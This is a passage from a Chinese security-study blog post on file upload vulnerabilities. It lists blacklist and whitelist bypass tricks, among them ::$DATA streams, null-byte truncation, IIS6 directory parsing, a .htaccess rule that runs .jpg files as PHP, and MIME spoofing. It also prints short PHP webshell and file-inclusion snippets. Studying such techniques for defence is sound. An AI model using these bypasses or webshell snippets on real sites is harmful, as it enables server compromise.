class="line">#一般处理程序（HttpHandler）是·NET众多web组件的一种，ashx是其扩展名。一个httpHandler接受并处理一个http请求，类比于Java中的servlet。</span><br><span class="line"></span><br></pre></td></tr></table></figure></li>
<li><p>特殊文件名绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">比如发送的 http包里把文件名改成 test.asp. 或 test.asp_(下划线为空格)，这种命名方式在windows系统里是不被允许的，所以需要在 burp之类里进行修改，然后绕过验证后，会被windows系统自动去掉后面的点和空格，但要注意Unix/Linux系统没有这个特性。</span><br></pre></td></tr></table></figure></li>
<li><p>windows流特性绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php在windows的时候如果文件名+&quot;::$DATA&quot;会把::$DATA之后的数据当成文件流处理,不会检测后缀名.且保持&quot;::$DATA&quot;之前的文件名。</span><br></pre></td></tr></table></figure></li>
<li><p>文件名大小写</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">有时黑名单没有对大小写进行特别的限定，因此我们可以给文件取名为PhP，AsP，JSp等待来尝试绕过。</span><br></pre></td></tr></table></figure></li>
</ul>
<h3 id="2-白名单绕过"><a href="#2-白名单绕过" class="headerlink" title="2. 白名单绕过"></a>2. 白名单绕过</h3><ul>
<li><p>00截断绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php .jpg   空格二进制20改为00</span><br></pre></td></tr></table></figure></li>
<li><p>IIS6.0目录路径检测绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">上传路径改为XXX/1.asp/</span><br><span class="line">tips：建立`*.asa`、`*.asp`格式的文件夹时其目录下的文件都会当做asp文件解析。</span><br></pre></td></tr></table></figure></li>
<li><p>htaccess解析漏洞</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">上传的jpg文件都会以php格式解析</span><br><span class="line">.htaccess内容：</span><br><span class="line">AddType    application/x-httpd-php    .jpg</span><br></pre></td></tr></table></figure></li>
<li><p>突破MIME限制上传</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">方法：找一个正常的可上传的查看其的MIME类型，然后将马子的MIME改成合法的MIME即可。</span><br></pre></td></tr></table></figure></li>
<li><p>解析漏洞</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Content-Disposition: form-data; name=&quot;file&quot;;  filename=php.php;.jpg</span><br></pre></td></tr></table></figure></li>
<li><p>下载绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">远程下载文件绕过</span><br><span class="line">&lt;?php</span><br><span class="line">$str = file_get_contents(&#x27;http://127.0.0.1/test.txt&#x27;);</span><br><span class="line">$str($_post[&#x27;test&#x27;]);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></li>
<li><p>文件包含绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">上传图片木马</span><br><span class="line">$x=$_GET[&#x27;x&#x27;];</span><br><span class="line">include($x);</span><br><span class="line">访问:http://www.xxxx.com/news.php?x=xxxxxx.jpg</span><br></pre></td></tr></table></figure></li>
</ul>
<h2 id="0x05-参考链接"><a href="#0x05-参考链接" class="headerlink" title="0x05 参考链接"></a>0x05 参考链接</h2><ul>
<li><a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1516346">https://cloud.tencent.com/developer/article/1516346</a></li>
<li><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/113084754">https://zhuanlan.zhihu.com/p/113084754</a></li>
<li><a target="_blank" rel="noopener" href="https://www.cnblogs.com/implanck/p/12392074.html">https://www.cnblogs.com/implanck/p/12392074.html</a></li>
<li><a target="_blank" rel="noopener" href="https://misakikata.github.io/2019/05/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/">https://misakikata.github.io/2019/05/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/</a></li>
<li><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_39653966/article/details/100553822">https://blog.csdn.net/weixin_39653966/article/details/100553822</a></li>
<li><a target="_blank" rel="noopener" href="https://bu1.github.io/2019/11/27/%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/">https://bu1.github.io/2019/11/27/%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/</a></li>
</ul>

      
    </div>
    
    
    

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者：</strong>
    Bu1
  </li>
<li class="post-copyright-link">
  <strong>本文链接：</strong>
  <a target="_blank" rel="noopener" href="http://bu1.github.io/2021/01/14/第十四周：文件上传漏洞/" title="第十四周：文件上传漏洞">http://bu1.github.io/2021/01/14/第十四周：文件上传漏洞/</a>
</li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>
    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
  </li>
</ul>

      </div>
    
	<div>
      
        <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------END<i class="fa fa-paw"></i>-------------</div>
    
</div>
      
    </div>
    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2021/01/14/%E7%AC%AC%E5%8D%81%E4%B8%89%E5%91%A8%EF%BC%9ASSRF%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%E5%AE%9E%E6%88%98/" rel="next" title="第十三周：SSRF漏洞学习实战">
                <i class="fa fa-chevron-left"></i> 第十三周：SSRF漏洞学习实战
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2021/03/19/%E7%AC%AC%E5%8D%81%E4%BA%94%E5%91%A8%EF%BC%9A%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/" rel="prev" title="第十五周：命令执行漏洞">
                第十五周：命令执行漏洞 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>

  
  
  
  
  



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a target="_blank" rel="noopener" href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/avatar.png"
                alt="" />
            
              <p class="site-author-name" itemprop="name"></p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/%20%7C%7C%20archive">
              
                  <span class="site-state-item-count">30</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">8</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            

          </nav>

          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://tanpuhan.github.io" title="CoCo1er" target="_blank">CoCo1er</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.y1nhui.com" title="y1nhui" target="_blank">y1nhui</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BB%BB%E5%8A%A1%E6%A0%87%E9%A2%98%EF%BC%9AWEB%E5%AE%89%E5%85%A8%E4%B9%8B%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E"><span class="nav-number">1.</span> <span class="nav-text">任务标题：WEB安全之上传漏洞</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%AD%A6%E4%B9%A0%E6%8A%A5%E5%91%8A"><span class="nav-number">2.</span> <span class="nav-text">学习报告</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%AE%80%E4%BB%8B"><span class="nav-number">2.1.</span> <span class="nav-text">0x01 文件上传简介</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-%E5%B8%B8%E7%94%A8%E9%AA%8C%E8%AF%81%E6%96%B9%E6%B3%95"><span class="nav-number">2.2.</span> <span class="nav-text">0x02 常用验证方法</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-%E5%90%8E%E7%BC%80%E9%AA%8C%E8%AF%81"><span class="nav-number">2.2.1.</span> <span class="nav-text">1. 后缀验证</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-MIME%E9%AA%8C%E8%AF%81"><span class="nav-number">2.2.2.</span> <span class="nav-text">2. MIME验证</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-%E6%8B%93%E5%B1%95%E5%90%8D%E9%AA%8C%E8%AF%81"><span class="nav-number">2.2.3.</span> <span class="nav-text">3. 拓展名验证</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-%E6%96%87%E4%BB%B6%E5%A4%B4%E9%AA%8C%E8%AF%81"><span class="nav-number">2.2.4.</span> <span class="nav-text">4. 文件头验证</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-%E6%96%87%E4%BB%B6%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E"><span class="nav-number">2.3.</span> <span class="nav-text">0x03 文件解析漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-IIS%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E"><span class="nav-number">2.3.1.</span> <span class="nav-text">1. IIS解析漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-Apache%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E"><span class="nav-number">2.3.2.</span> <span class="nav-text">2. Apache解析漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-Nginx%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E"><span class="nav-number">2.3.3.</span> <span class="nav-text">3. Nginx解析漏洞</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x04-%E5%B8%B8%E8%A7%81%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%96%B9%E6%B3%95"><span class="nav-number">2.4.</span> <span class="nav-text">0x04 常见上传绕过方法</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-%E9%BB%91%E5%90%8D%E5%8D%95%E7%BB%95%E8%BF%87"><span class="nav-number">2.4.1.</span> <span class="nav-text">1. 黑名单绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-%E7%99%BD%E5%90%8D%E5%8D%95%E7%BB%95%E8%BF%87"><span class="nav-number">2.4.2.</span> <span class="nav-text">2. 白名单绕过</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x05-%E5%8F%82%E8%80%83%E9%93%BE%E6%8E%A5"><span class="nav-number">2.5.</span> <span class="nav-text">0x05 参考链接</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2018 &mdash; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Bu1</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">68k</span>
  
</div>


  <!--<div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>"



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>-->




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  

    
      <script id="dsq-count-scr" src="https://.disqus.com/count.js" async></script>
    

    
      <script type="text/javascript">
        var disqus_config = function () {
          this.page.url = 'http://yoursite.com/2021/01/14/%E7%AC%AC%E5%8D%81%E5%9B%9B%E5%91%A8%EF%BC%9A%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/';
          this.page.identifier = '2021/01/14/第十四周：文件上传漏洞/';
          this.page.title = '第十四周：文件上传漏洞';
        };
        var d = document, s = d.createElement('script');
        s.src = 'https://.disqus.com/embed.js';
        s.setAttribute('data-timestamp', '' + +new Date());
        (d.head || d.body).appendChild(s);
      </script>
    

  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
